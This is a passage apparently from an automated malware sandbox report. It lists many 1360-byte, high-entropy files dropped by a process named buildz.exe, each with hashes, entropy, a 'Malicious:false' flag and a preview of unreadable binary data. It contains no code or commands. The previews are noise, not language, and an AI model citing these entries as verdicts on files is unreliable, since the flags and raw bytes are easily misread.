F.{Gm..@.V...6%.P.6.3..a...~......z.......v...W.......k>K.;.=..C_]'.!9F....&.O.&J...'..Q..4O..aR%K.dv^r.@.[6....\.%...Y..[N....%....C........x..A...#..f.~..Z._....R...N..7..p.....u5:j....8Gw..H.UO..Lkm.O....L...F..0...K.j.*.hR0La.].f...pQ<.....1..V.#G...n~;t../.....pA4.........W..rz..i.s..~m....[-.....AW...S.PQb...K..V.OT6...jc..,...F4+`_......a~.N....X-[nWP..vk.l3...y....(.C...J/...t6vG...Z:.=4.[.i.rYE../6p.K....-'A.Y2...cG..3..4S@zPv...l..w..i..........~..0..j...Q.U)....~.M.@.............h.<..Ph;:?6..<)...@..m...v.....U.......'..R.I.8.xR9@.x..k...k....p>...G....`J...,.Y"eq.^..%(.bK..Q.....4./.X...W,..z
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.85461789300601
                        Encrypted:false
                        SSDEEP:24:R3JFDpLWf9aACkjx36WGM/7JFVrnK5OsqUPAXUoWLyECd2PvQIoGbD:TXLWZt3sM/7JTrnCqUPyzWLRCd2P4IoA
                        MD5:98B92CD9986886A2A0ECA30053981CD7
                        SHA1:1263F1CFDB57339D4DF7B2B5AB2497858D7F55FA
                        SHA-256:AF0C91BFC89DBA062F40D415E4CACA92244D49C3829472B5BC0BD500442EEDE8
                        SHA-512:9D8ACDAF2CAB0ED94B2C9A0BE32DB14DAF012C140719D0CFD5A4251AC77ED1EB770E21A3B0D0C855E738DF446898110438B3AFE6C5BE788A139EE0851A50F20D
                        Malicious:false
                        Preview:EIVQS=.V.pC..m....V..!..4.....@#Pz...e..pET..xQ..UU(..$..m......k...Oz.....j..}+%......./............\ .:^..9........o.s.7...5.}/...1....#}.L.YE.x..h.a.1.....e..E..p.M.Y....Ba jm......@.;..d./.v..H-.....!...`g)..Uam.-.b..n`)....{.......5tA....r.....-.w.rR.A...P<....N.5E3..........fD......{..M.....p.....L.)._{..vH..AS..K.h ....('.........<s...`.\q..b..J,.M.o.....9..~.!.J......0/.#....0.tc8.xF.....b........(M.a";..G..>.\C...X..QZ..f;[...>Y...k*..........u:I..M..b}....^.K.S!.....7.......\..$...AD....bF.z...v)...L....5.W.......I....z.y..i.9...:Z.......L.../....T....MAKb^c...`p+.#.Ig.......=.[%..D.t.}H.<...x..W.........]......._..fe..U"p.5!kr..*.gI..m....s.M3t.H..}.k:m6&..m.-y.V7.k@..K.3H.....b.UR...%$g@tH..`hN..I..d-.....2...SH...';.pk.....n.;..N...'....X......tgUT0T.r..MA4.......fCt.B..JGt|m..3'D.....@.2...j..i.^..yZ..p70eg&!w...n......2[z..$....|...:..X?....S...jE.].thb..k|B..t.V!.}...i..z../..B..IGp.....$.<<...L>Q..K.....i,.N..A
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.859113791562318
                        Encrypted:false
                        SSDEEP:24:RZFKM1LHaH5sn1+vAwvfKngT/dGYXtGcJutn6XaOmmuCOGbD:LF5aS1+vAwHINKJu0KOmmbOUD
                        MD5:BA91AA682055496D9F36E661FE343B8E
                        SHA1:ABD4864DC668676B6F6679026F6FBC4145AD4E39
                        SHA-256:8D32C607DD6F416DC1A589D423DE647FBFDC6F765D07ACB3F61933E133291677
                        SHA-512:25C443D058A6BED348ECD070F971155258366A26A81D118A29028F84E125FC5F10F4E47E7A9ADBF087DAFFD9FB3A932804884C612A3B09B40AEA2D55BADAFEE5
                        Malicious:false
                        Preview:EIVQS......."G..Z2...\...9..Q4...).R....T.....K........}.B.X..Loh..._.}3@.J.$..C...`l.....(..,*...i.c9..Z.'A....")*.c..l}...b.......>...1...j..13.L..9dlDG.+@..u.2u8..Q1.0.S?.k.....(B@..D.......Cz[yg.<......$..6i..I.#..........L;........n7..1t.]l.a......]M...-.N.{.J...#U\....i..74.vF.....#.t-.+.9.oY..U.ea.>..P....<.......f.t<...L..e...3..&....!CU.C......[6.K[..X,....Q.......F...C..[m..]\...t.^.b....Q|p'.q.O.2..t>.!.;..Q.Y(.+0....B....~Qq.N.................@..5..N.G.N...y.....2;..|..W/1\p].b...T...g.../....%*$...%.d......Ex(\..p.G.E..4JWl.SM...{.....-.N.8>.0...y.........R.....}..g.F[.{..../..E]n{IF..;7..C."e}o|...#...4.H...HY.^.X>.;.u~...0....5............-s$K.....o.....}......&...?-"..=...-d....o.?`;....._!..*.Th.S,.{1...|.a...3.....N.r.......[ uB..z.N.S..=...#.../Y.D.6L)..$.{..2Td...{.....lE1_ ...w.p.....l0oR.......zM`..2%.JI..A.<.....4s.W.y..n....o .~(..bu....V...,.R.cK-....h>M.^m*lF.Y..]..O.t..b.J...dS@..#w..K.IN.MMH.Z.~e..e`
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.836878180358455
                        Encrypted:false
                        SSDEEP:24:HqOp8gQBb9eqdOHo8s1j/sNjOGsf4VPnweNvXgaWrbGFa0Hme0oZqXEu1j2/Fqlu:HqOSgQBb9emOI8s17sNKL45L/gZrqF1F
                        MD5:1B1044025E735E9330E017138554A1C0
                        SHA1:040BDA6A4B4A518E41EC49B8A35870F75F044BBE
                        SHA-256:A78EAC32514C52E1B94DC2D72DFD21A79599242341D88D9E8C4C37494168AAF5
                        SHA-512:1EFBA3018B2C84D7886DC3DEFA0107ED7CE1CB3792742759A50BF17CE16FF09537290CFB847CC4D53E56E10628339C59DFBCC67979704E91EE0FA9CCFDFF7CCB
                        Malicious:false
                        Preview:EWZCV...\.?.W*c.....x...j.1.J.U....L\..j......b..R.H....3...\c.......x.......7HY.b~....1...`#.< p.`.7"..(......3}.V<........q.....#.5P.."...H.Z..>y..|........F..!..N.....ggf,H.f.An.?b..'...F.b....H.g......l..M..Rx..........B.?.]....Q.a.>.v..)0.W....RR.....N..U......z...f.......j..t..{.g....r.%.....N............d...N..w.1.... 6a.)n....j@..&g.U..2...h.....,..+G...Qv..{?.|.tA..........p.t.... ..y}Z..2jD..........l|O!....\.oz."....d..$.......n..h.....]5...o.Ez.!`k;-..?j8."n..Bz=.*r..S..[..,.v.H...6..OTwN..UZ;n....{....s.....dL.....<..M.....wb..e..k>..c.I8u.S,...L....-\..H\.*Y0.\O...r.mH..c....9...S.6N..JM..UP ..4{...H.8.Wh...2,..V^.x.@...b..Hs....\...Gp."<.`...bv.?{+.G.......t.6.T..k.Y..5._JY.A..C.A.T.-.....0.l9...M..:.#@CP.....p.......zNPL.'..&,|.w.j\[..#.boG..u.k@.S..w...-&Qns.....2u...@.n..r...>uI..X=.......x..C.?,..=.....h.X...:............qz...v: ...b.Z.$.9.. [.m.9........$@..+o.o.!.y4..ZH...GFY.........S.].P..w..R....WD..F.....|.H...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.852299222827455
                        Encrypted:false
                        SSDEEP:24:1Fw0brsCgQ1UTxtX9DgDV3oUUogw6/9M2NLMgbIvOesaScGUW4y7u/VGbD:n13+XXlgSNc895wAImesJRTj7MUD
                        MD5:7CCCE3152AFEF4EF169A2AEC148B8625
                        SHA1:2E9CCA950B03B38A5100CBBCBC376843EE1F0C43
                        SHA-256:EEE832DAC07F23D9192AA0A564615B17ACBFFD97C8B08852A39143C6A4DB24C2
                        SHA-512:D83A740ECE40012C13CBDE745CC19877DDD24A649D94CFC9614DEF2CF87D1324C405A8193E1494B8BB90C29DE01B89220DAE0C0F1D32D50DC02F9D379E164B76
                        Malicious:false
                        Preview:FGAWO..v.b..........0.2......y.....&*_...p.B.AI.,...[..r.....>}'t..vX.._.....a.....rY...z#y..Y.... O.N.S.$?/.}.:..9.s.....^6]aZ.....HfyS........8.Kz*.\.G.....Tg..=.U.w..w..^a..T^..sG..[r..&.Z.`.j.\.3.j...h.sW...3...[.........8}THU.f..o.....RW.F)Im..l..l.t1".e.......Lx.(...x....v.........#f.;....f#.i..4#...o....s.Cg.L.I..P.u..H@^.......N.c.........$w..q.E.^.=/..p..7:...n...F..;..'.H"..NC..T..w[*.R.........3;k...e../T.r.8....C......v.....e.bP.bi...$.......w.B....h..**./.dr*N.\..F.u.J`4.f...>..._...a.G1.{..5.S.d.g..P.XY.y....ft.U+...{}....X.}G.......o:..g.<.l.5A.U..C...b....=..C..B.>...|.{*.yC.2.&...H..,.(..h....j..6tN.x.!9P.Ze!....]0H...q.:.T.;..%..fG......E.P.SB$5$.z..n...j....%^5..Vhb............&.!......rp1;.W(K.Wr.....E*G.s..ExA......AYU0.{o.jX...s....z1..._*.......=.4...?.\4L.n.....@...b..dc..Z..$.....a.8&.H..`.h...>}.0...k.}.n.y+H..3..'m.&.....3R .b..C.9I_P...]K>....hH...][.G/.F....E.#A.2.jhq.....Av...VY..Z.z.".m.......eB....Y....l...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.828239911347518
                        Encrypted:false
                        SSDEEP:24:nrD7JLpmibL15Bvu22NXvyMfyQrlnR3kXD/JC3gyxIh1IxhKNlCNFk/0AD3sJE7x:v79DHn2NX6M6QrlnejSur4qCNU0ADcJI
                        MD5:BB5D66E02B5E16B363221D87C48E7592
                        SHA1:22B76D112258D8D51CCD79F7A8E4EC3C2A3C4C37
                        SHA-256:7663F19704EFD6EF920747D8C77AE0A9E451110B70366C4EBBBB135A49323BF4
                        SHA-512:A5B2B882A8F5124E287C9405322DD0DB540EA44C784E6FA35ACE937CC8BCD8E4EAF20131E2457757671A3CD42D65C3850111FD38B10ACB540351C9CA579B40D4
                        Malicious:false
                        Preview:FGAWO'...{.[.Z.`........Y...P@..|I.].....0=.@..b...kE....G..I\...C..0.....=..tU.P$........2...Q._.w(_F.W.........".9...f.J[-abFE\]...(..[...p....8..S...U.n....4.{..d0.;...oQ.........@...{._.l'.@.qM]/^J...)GR..3.VP....fR.5I`..+k.F..(......y...+...T_xG...+,.=Hk....-Z;J...P-=S.2....2>......;D.........1..V.h......%K..#.F.Gw6d].`n..r.LV<o..y..P.4..p.........Q.......&#.........M.p(.^.."..<...0......w.....*......#u.2.I8..-.......(S{...]........)r....b.....]..........O!.)...T........TD.....&=...../.o........W......x...0.%{.`...Y...-?*..J....]J...U...W.K.49Ep..&.t..."..r 9.J..P.]..NL..y.Wq....5?....g........./..t...;4W..F.:,\.....p...|.]......D......Y.vk&.n.<..kTw.B......m.........FwgD....U...).vd$..l.`.``.......mq....c.dN.Gn:......w.aY......G.q.1...n....b.v?.X..........U...6..*...%b`.U!..Y..-....D.B'.x.R...(`p...m'..%q..../c.$..1.....{E....-.....9..L" HO..(...}E.tR..!.............G.A.o...#..P....d".x...s....H.B.FIj'..j-........#..[i.=....bl.f.....R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.862105160670906
                        Encrypted:false
                        SSDEEP:24:pzFg8t7KyQ0jAZ1DBPcZiA3dyzXoVttlPOUffT9DQqMM7GbD:RZ7tQ0sZnQiiyroVT1O2dUD
                        MD5:E34910880324421FF604318031C1F016
                        SHA1:BFFA512A4EA3DC0424882861B06E99D27D716456
                        SHA-256:D300ED48BF42D5F549641D57635EFA1697872283F8DE842DE28D0F89A0C3586D
                        SHA-512:E3D7D659AD74680C75F29A94420BCB65311CCA5970ED1C087058BFF0188C0B0F429FACF38C5E80CF7BCD5438A25B068EC4D7BE732B677DBC881A63FE26C4B70D
                        Malicious:false
                        Preview:FGAWO...i..W.....?d....H..%..%fK.mZ..f.[.:...pQI9r>.~$...h].F.).h.x..R8.\..!$sY1.....9..c...m.8d].!0.......w.....7v.....g#.A.g.H].a...It.`....t..$..{...X.^..'....^...]...<]~?..C..b.5.C![.*..V|..Rv.g..0..R.(`.x.S...l.........$Y...vL..Y..T...cc..^.I..]."GAfY.........D.K......:n.....&.>..U1..B7QW=.XZ.....p......@......i-5y...[|..zs...7^.?ZL...HuX...`}...s. +.f..m.T....|..^.2= .(7...0...)l"..D^.....\.u.V.....;..y.u.\..{.|.(b..s.]..V[L..,Y.2.V.@Q.....n_.?.p.k<..IG.7...\...8.bkQEO..*).....+...Im.aR....9.Z........V.....#.%.gj...'...V........)....6.O.g;....H.;.p4...U..{z.S.th._.Ow.P.Bd.../.f........$|88...]..dc9.F....vQM..xJ.n.R......................knT..#n.##D..:..........r.=......S.a2.y..Y@Z8..?.[&.}.$w(.z..J....T..=.h......B.;...)N..Q..|.EG.ln..m..[..L..2.k.........R#..C...ne$-Z....+g....!..`=B^'o.)...R!-.......<...S...7....x...........p...Zm.F!..4."....)z.,...Fc..p.O..KrF.8.EM..[|...p.....>.p=tYA..ncw..:.E....{..9...Bt......;....5.`Z.i..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.852214924954619
                        Encrypted:false
                        SSDEEP:24:ziMesXvzzdeHKT871ny/rQ2ZauOjJ1Y2cI1IJSdFCgixzGId4hGbD:hesfz4R1nERBM51IrRGQ4hUD
                        MD5:C66CBCB1E755AE7BE54044B24F83F6C5
                        SHA1:669FD1B0632D898287F22DAEB98B9DFBD00E9877
                        SHA-256:55944A53F4C45963E2871FD589A0AFE7D029E08BC3E136B9EEA4C24FA46C0CAA
                        SHA-512:4206B63B7905FBA3C59F46D9ABE9A5A8CCE927B28FD927CC20119D52D0D1F6EB1DB7B32DE0211D33901E085962B536D8AD1FAFA0C9713044DEF65AB17AE02D1E
                        Malicious:false
                        Preview:GLTYD..v....,.Y......mq. Uq..}.....7...n...@]V.U..Gf{'.!..{o.......l/j.YE@D)p....S.b..Mq......./....p........qI.W!....,*..w.r..K9.o..'Y`2&....M....\L..KS.g..8.7....'...H.V....|R..J.P...t}G...*..}.'W5..eW...V...:....Kx..Z..h.U..g.]7C.....x].&ks.L.|..Z.......Bq..`p.:SX.......#.+....#.iU...mH.t@...t.s....4..T.Y.z..8...(..&R..S>^X....[.?4IHdB....k.JG...D.V.C.........N.<.e.;rg.7..4)..:....w.Pq%....c..I...q).5....e..?....A............q..........._.t.G.)j.|....T..\.J..8......D........;....I..L.3I........O..0....v0.Z.=.n...Y&.I...0.......z..,RP.i.B..&+.x(.+./..?..f.,........d...u+..5.......`../..x.z..J.(V>........=u0Y..6.....(^..C.0..1...1.O.>......j.......CV.Rv.E..b../.D....D.@.e..b........O.h<z.#..FY`Dhs..).........vr.w=...w.2..F.I.9-.\.(3i..*..gr....W.;K.p.z...*.Y....Rl["...j....!.c@e?:.*?'.q-X...I.f..)..t...I\4....<.A...ur.b...?...J.vH...#...T..... =/..}..'.........e..-.x...#X....9.y^...2.@...Z".6....N.4....'....f.C...i......:.`\>..M..,.../.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.838673125352254
                        Encrypted:false
                        SSDEEP:24:/2ei/6KRRmbEVIXwbW76lzoD+j0CfPNQGZx5iBLyM9n1zHGbD:uxRSEVbS7KA+j0Cny0+BbVFUD
                        MD5:9E56D97E5C96DA8A613CB92217AD4974
                        SHA1:387795B66BA83F206533D93074427AEFA2996103
                        SHA-256:5110D1FB5D07D417224D8389772A60E7FBBFC8A3CB753B03C9D2581EF9CB51E2
                        SHA-512:08033BCBC8DDAF3A95C8D0CAFEFB0A3EBE450539C1D75227BF9F4464CC4F306963F9657823B45C149190347DB8A717BB372FDAC88D4A5E9E461EF82C3CAD55EB
                        Malicious:false
                        Preview:GNJEV.U:=...z......K.....Q<w..5.D1...-....UM.y.O.~....8G%.....E.....x...RB!..%...hP.nh[.7...]..z...!.*GYG.$..P.z+.Hz...S..G....`....`.v..*%...r..........f0..Q..#dFw.6......&.Z..V....G..p..~Zu..].....V..h...W.4...l..u.G..R..L}..*..P.@t:+...~....n.N....^...3.....;..d.{.X...jE...@.....&...&B...)...{@.*...F.....p..Iq. .h.s.a..Lj..v......,p.+... ..\bCO/<2.......!....W..H.S.D..<....+...zS....p..wj....M..Xl..H..........o........dn..`.m.!,<.B}.u..s_..Z.W.d.\'..ll..8>...D....*....w......a...........U7.`......@.G.g.....Ot=..r.uX#..}E....J.t".:&8N\.z..^<j....O4RTZi+.A>..p.c/..)$.n..........N.&..g.|..............J+.L.k+.Q.vy.%g"\...>V.....v4.)(..9..r.~.(...........&e.'.$Wx*T.IH.K.)\!u...3.?.....S$.=..D..U.....+..8.I...n.M.h..@..<.7Kk...uH..._..vP....@..Q.g.7Te....1".2.2....FC.r(e^./..)......6r.v....G...T...BD.#.*.a...<@..t.R.e....1....Q..F.]1G2...S......8.t.*..q..p<..,..\...D..... @.u..;..co...-....Kw.._..k. "....%O....L.L....Tu..;....X.C...<...K.....l.z..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.858075317288121
                        Encrypted:false
                        SSDEEP:24:/jmP+3KEYqkpU95sTskdLzKS5rGpabqIUxD6Wk2Me/x86ODuKWVOu4OGbD:bSEYpMsPFFyhHxejkXEuKWVt4OUD
                        MD5:12A2974926A71B323C485D297109E70C
                        SHA1:081C2CFB3D7E6FE759EED9CBB076296F9FE4E72C
                        SHA-256:B213805BCEB2F0E2853F7E23A6475B1E95AD1BB0EB0CD71158F10A867CC12510
                        SHA-512:68B4EB9ED06032450B96D3618739307D6941BAF7275347C18C18960E9570706740C4A33F7B450B3EA82D87026564A7606A359936FE9B775A5D2F66085E1572A0
                        Malicious:false
                        Preview:GNJEV.B.....R ..x..OK.......].g...."K...+y..7J..[..V/..$.,.i.o.<.l.......z<Mx.g.|8..../..Q.v.wB..)ExP..[....Z.,0W5.......0g.A...Y....>|.fV&.g.R.Cc..R..rT......1].._.R..=3...w.B...&|g.. .T....E........(w...W_0W.....,Sa_u.D..$....;.D....ZV....7.`Y..G..._..Y8':....03.....@`.x....../D..+.?..................=Z...b...$.peaB5X......*y........;(+.@X;..%.. u?.../..(w..sfo..g.LPA>EO.M.e.~.q.B,m.D..:.;..V.(..%....T.8.U....S.p..H...H..Y.i..d<.[...R..%H..q.X.P.S|~..i]5...n.U.!.......]...hf..z%.....I..~...J..8....#sl..,..>&...,:3.{..=T\J.$..C8.......G....8..h3.|..;...m....aK7.=.......P_c.[t......<.F..}B...+.j...dd.."..7>w.n..........a.a...|..5.......d.8%.J.,.S......3T%M.f....Q..R#....4..^....d...8....E.u.7....v...Bv=..%4...........6|.i...sQ ,.*1t[.Vg..2.O..QA7$H.n.....T...L......?`..(1X.;.|L.k.ay.D..0...!....._...p..!NH.z...........f*.p....&v~.\.2.f...'.u....v.-.B.gd.*HG,..*..3....QF.E<F....mg...g...#.~..>0r..... .}i03...n..[>K1,..h....s..C{.o.>C
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.848117685246658
                        Encrypted:false
                        SSDEEP:24:kmD1qJwvYBKoUtl+AXkt77smYNDy2BwrfLYCczQJEkTDhH6OFohHP4GbD:zkWgFU3+EkR7sU2B9jNkPhXFoV4UD
                        MD5:5A17942C06930C54C3A3B5F995865C94
                        SHA1:DB47946097EE117403C7052E50F64D2D2C8507BE
                        SHA-256:0DD2F6829809E444926084782E22E2B47B4FFEDB0F0CCA3DF658E2513376957F
                        SHA-512:AC98869674836AF492B0F0391BCC2D5FAB46ACCC2353D6FF4C2AACFD111E05D28E263EF6EB07E99E7BCC5FB3B4BA1D5EF5A27BFCE16CF2E22A462CF9C1EAECA9
                        Malicious:false
                        Preview:GRXZD..a.....F.h...\/b....ta.k.w.>..kz...>.._.".....n"..V. g.02...V7.NX..0n?..&^070.gW..u-.}/..w+.........A.;v......Q.@aN....m.{}......B<k....X\.Wq....;x....{...3#.f..:&;A....Fl..f.>..Vh.F5......S...........f..@a..?.}lu..8............c.Rh...Xf.).....!.2...g...V.}z....^.S... ..#.|.Xi.....$.U..Tf..a~..2.W..}.`HJ9.75........X.}c|Y.]}....#+.....`.%K2.G.5...K?...u..Z.>...K......7...R.PeA6+L.....*J(q^ ..eg.,t..e.b.....K....\..#U.2..:q.7..t].[.y[...]...\...[.s.W.,.....<.-..[pWM.......8Mm..*..X.;...M............"aq.zJo..........2c.&.....w..YwI..!.C.s6\..P.....I..3-.Z.....p.m/.zE...lv..\.Y.g.x..~...^G[K.......S3=...f.kr.T..u.G..T.~KL.;.O....}..f.`..|q#:..TD...N....w>..i1......Q^.+......?x/.l.....Q...a:r^.i.:..:.......u...0J.../.z3?.^........vM].b}F..5..."\g./.Y.m...Ao.(....5t.G....W.....(......T..}.....vp.!.s.A........."..4.H....f.<..A7....0 .N..6f.(..]... ..vML....S..~.N.b]-Z.t....}.".....WM/....p.n.@..7.....{..qFja.sH...r.B....+u..x..d..~..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.854896592401753
                        Encrypted:false
                        SSDEEP:24:YB7pFRbOkiePMHL4itnx5NY4l0DSR759wXvgkKapU1CWV2Qp+LsFUOhNSohb9R4p:YB7pFRbhie5iJx5NtlrRd9wXIkKaNWVu
                        MD5:49AC05113C941C809B77DE62047D05AC
                        SHA1:F7881DB7E5A8AA4E3CB142B96824BFF370BB6F2F
                        SHA-256:5D10D7B930CEAEC7289263390A719809E5716474C560AC2559619A9074C0C345
                        SHA-512:2B7157DC9EF2AB921EFF092ABA22C72B3C659DAF1C37D08FE9AECC9467CB9E86A607C1CF51DFD094B21B2A55B942EFE2D7D8C5E7AF31D851D4A06108E3FD912E
                        Malicious:false
                        Preview:GRXZD.-o.k..Q..3.{...%...'?FDXF.P.....R@t.v.O..\..sjU........T;`..x..p..Pj.l..FL1..<..a$..#}@D...8..P.Xq..p.|...?.).E..t..3....a....../G._...>..a..T.(......)...&..69<.....!.Fr....Do.P7. ..L............6..*.e..y.......p.J..HZ<`..X..C.A....|......=...'e..!.......T..b.)..4..(.0G9.6o?.T.c....g..A$.!....O...E.'F........m1._....(6...OG...*.o.....K2.....5*.....B.I{..q5...4.......@.....A.%...}......|G.Y.g L....ky..|C.I........O....Tr...txD.....~..<.LE.*....0.%.+.b3.F..4ZE...X.s.)G....$|C....?c.....Y`^...J%.lw.N=.....n<URg`\....I........]1Z.|........6yM.O.,:e...R.^._jO..}.c.4..R.o.....'...A......1.Y....W..t".........q.I......4.G.zz%..n.......DF....B.z...Q(.f.r.S...0..W.].)..:..N;...\.....c.....T.~.5...E.....;....0R.r.:..y).q.M...3....)6<Xt....5...P.c.]..(. m..8.r.2.Y3y..>..e...BO......8..==|........<..IXB....W,.W.jm...S.~n.({......d_...M6..-3.75.Ji.CN.j.Q..,.^.z8R?,.1R.\.k.4.[^C.....A.x.......\..C...v.jGX.U.*..._H.R.........\3..h..WrK4.}Z..j..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.846505234821355
                        Encrypted:false
                        SSDEEP:24:XtErsubg9a5ganusJuwzfNrONFEByA8XBfVSVCrmHI6FiFqjAF3i5vqROj++tKUw:94suk9aGAuwzVrI6YhVuWmHPANi5yRO6
                        MD5:1B3E5F01F94B2AEA2CE0A472CA8D1354
                        SHA1:9DBD2A5749A902AD1C47FFDA1DFFFBE25931FA0F
                        SHA-256:3ED30A65623BE73549BE96F22EF52E70C2E20A916AF194827671CE2E83E74185
                        SHA-512:7B41D9FFB30B4AE8FF258B6FD4E2A9F538E139FF2C1A613B57284B8AABF8964FAEDE663FE4F7FF2649B466A22DD7C65813D3632A5A640001B401F69D8011DD9E
                        Malicious:false
                        Preview:HMPPS....(1.M.#..2.\...!.Z..Hu.Aav.v.n4...,x.A.*..R.....a.$..m.....f.~...^.G.hhM.N$......1=(kv.1...N...F.*{V......^..E...0..V./.[..zH.@q...&....m...;Qw.'.v...t.iEx.\@K/.9Zy:.m,.9.o...G..R..3....r~jZ..!....Q]L..s...k...B....<.6b.....PT..0.F*"...s...9.aHu...X5..]8..).k'..........zF...9.oh.g......R.8. y|....-&kC...g....3..#.+..l....n..m/...*5....K../.T..n...g..i.n)-8....B.i.%o.<?.....,....e+.Kl.../.;........s&..0*.H.?.[m.Q+.4....Y...>.......y.D....._.$.......]J.5.....F.j........Pc.....u....#G...J.lS...|0.fWG..hu.0ok7.....S.......5j.2..5.h.........k.!}........_......n.=.[........&p...=s../....:d.i..e..Jc.............bw!......MI.B....?F<..C..J..O(..q+ \...c....Dp..v......x%.KS..:g..*..w]o./.."...F.3..8M.....Z.<$U..Q....i.K}6'./.Pt..N-..K..|.!r.I&...'.<......k.l.i.<1.....{..w.Y..s\.E4-......'..X.>..C.3..Q?...&..F.nA.v.....M0K..h....w0o.Nq...m..........w.p.W[1..J.BjC...n+2i....\..7...=...K...C70..ur)b..[j:.Y.o...p^....#...M8...n?.#u%.....b..."=A.^
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.840487081848331
                        Encrypted:false
                        SSDEEP:24:ZEOh9HJ40+FAc0+3krn70cIReLiq9BAx/XW4+VwIFlnbU3MAPdep4GbD:nh9p40oAc0vnoLWiqS/XUzLngbl64UD
                        MD5:56BA3D9DBD80C918948EF9CB12AFFA83
                        SHA1:7BC108C0B169716FC60B69C2F6BD67611C5238FE
                        SHA-256:A9FC74B36FE2E365A9AA2A086E14801DDDA90DEBA024C04A3FDC1761032FEE3F
                        SHA-512:CB7951FC793FFAD8971F936FFC23B38FD65DAFB63448EE4E63D7B503AA06778C9F87D6B24CF5408D0AC1CCFB9F23A9A97A7589F9BFCE6453B72DF5BD193BCA81
                        Malicious:false
                        Preview:JUSNI^qt...-^..N.|..xK...46:.Y.U....i.c.O...!...."0+Se#.!.];.vb........d..nL......."u..o.6).7.hT!8..z..d.gL..(L.y.kP.1.D.z...z.(;.....mB....W.Vl..'q........x....Ef....OM..@.Xn|....y}p..PtD.u1..Hg..s0@.X....M...!.\P|.... ..d..'.....|.dG;..|..+X...^a...<n.4......"+.v.mf.U..Nsx.....).j..h...+.s.....0N..l.rT..M.?...q..E....Hb........%..@.t.$..p.WuS ....Gs.!...3...1..{G..T.NM.-...R...M..];.....I.|.J@.n...Y.2.b..F.x.t{9C,.......B.H.....6.......-^<.......3. .....2._.3.C.u.-..hZ.%+..p#..~..4x....6.C....k.%"......"p....R.....a.>..r.(\...:$...m.............{.O.......n...2.U8.!Ha.|%................Z......:.{*i..:8..#|..k9.....i....5J?P-P..$,.m..C.;dX.F[n8y.LQ..(.Y...pS....n}..!".7.....^K..?|j6.UN:U.7....&.|.Z...;.s.T8....B...l5.@.g\,....&{..m..A...D..<..._.i...t.....(..:...\4.....;.~k..~.......Q\..~.....PC.""TF?~..4S0...M....y6,&G_3.|...0.........X.#...d.B0..."....]....JV....H.V@w!:.}..Jp&...Mg.. ...K2......].l..2.n.N.Q<({..:A.zP....:&.@...{.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.84030653128179
                        Encrypted:false
                        SSDEEP:24:bKi4blQSA+KRQ/RbFulgcL0CMRQQ7oPM/QoU3drH1YhMdtNu7noANT1Ie/QIuHH0:eDlQSvdylgc5c7oUVY9V2AcNTF/QHDUD
                        MD5:D32AAA2A85305ADF578FEFADBCB74064
                        SHA1:604AA37EE7A1F382FA05C0DC736DC260B14F8045
                        SHA-256:A1C48A152164BA36F12C41C3333768D3E024B34B3170ECE26D598A383239D5B9
                        SHA-512:201B49B3E70BFD16027457C18D2F35A5A97685FBFA21E3628FA87469D6938EC5B967EFB207A4FBA142D7F35E959F6A4379A10DF91F2434FFCB1B5288185F1139
                        Malicious:false
                        Preview:KLIZU..%UU..Qq..*A..$..o.D_..U.E.3=.*./',.|.Y5......:...|.[.{..t.ZM`.Mq.3[.2u......,g6){W4ituaY.k..E{<5N.5.j=.#..Oe+..I.1.....o.&...D[|k..&.w....e.K..)2].Bf<PN4..(5%..=.[.w...].N.p.|..*5....bf....a,..Yi.J,U.... ..i.@..?..W.&.$.X..g...Q_'..<.lMAV.H4..M..Q}. ..S.n.`..&"5...S.UV...V......U.?....0..x...}k.m.d..|.y..}...s...I...E...H:....fHE\......".`2.AQj#..M..^k..E!..m.\....c>..v..i4..yB....!.K...[PG..q.....8l..1....D....4P....{8...*.y..0.z8....UU.G.:i..Q.6e....n..k..!...Y..+@..1.h...E..-....M.(.D.b...Ry.-.H.G./....o'6...v;=k.....2......mB.r.`5.....8 ..ca..}.....BNRM.....S'.B......I.N.d.5.B..>....ma..v.E8.*W.S.B..<..OX..T\.q...|o8..S...n........nQ..Q u.....!...5....p...{.Sx.;....Z...?..S...0..W$........q..-.....K..'..Xe..}..}MU.~ Uu....nZ..Nt4..=g].E.]..3i...,D1..~=..*3.1.......D/.n.....p.Nh.\1..G.lW.%....lJ...G!.....n..i.{.f8.....S..''.b.C......4..'2..m.I.A.)..(e......UV....Z....L._..'......eP...O#.E.V'...M....B.......%..S97C.F....q....@..........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.841162143743496
                        Encrypted:false
                        SSDEEP:24:bmWcNRGhoF76YTwwk8V9e/ORj/fjMWlXcVLmYNqgNO/+lpajteObOP0vI/l99aGX:rYZFmoww/aORjIWlMVLLqHWCteObOPNr
                        MD5:115AA1421F027B13A8347290D7E434A4
